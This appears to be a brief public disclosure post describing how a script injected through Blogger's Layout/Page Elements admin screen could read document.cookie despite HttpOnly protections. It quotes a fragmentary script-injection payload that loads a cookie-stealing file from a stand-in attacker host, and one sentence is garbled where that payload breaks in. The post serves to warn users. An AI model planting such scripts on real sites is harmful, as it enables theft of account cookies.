Blogger cookies are usually marked with HttpOnly, so that they can't
be stolen by gadgets. This is a good thing. An exception seems to be
in the admin interface. If you go to Layout/Page Elements, and click
evil.example.com/stealcookies.js"></script>, that script will have
access to document.cookie.
I don't know if the cookies this can access are sufficient to do any
harm, but this can't be a good thing.
This is not a simple attack -- it would probably require creating a
widget that had some other functionality, and then convincing people
to install it. But it's also possible that there are easier ways to
bootstrap it than I have found.
I wish there were a non-public place to report security issues, but I
couldn't find it.
In short: Only install widgets created by people you trust not to
steal your blogger account.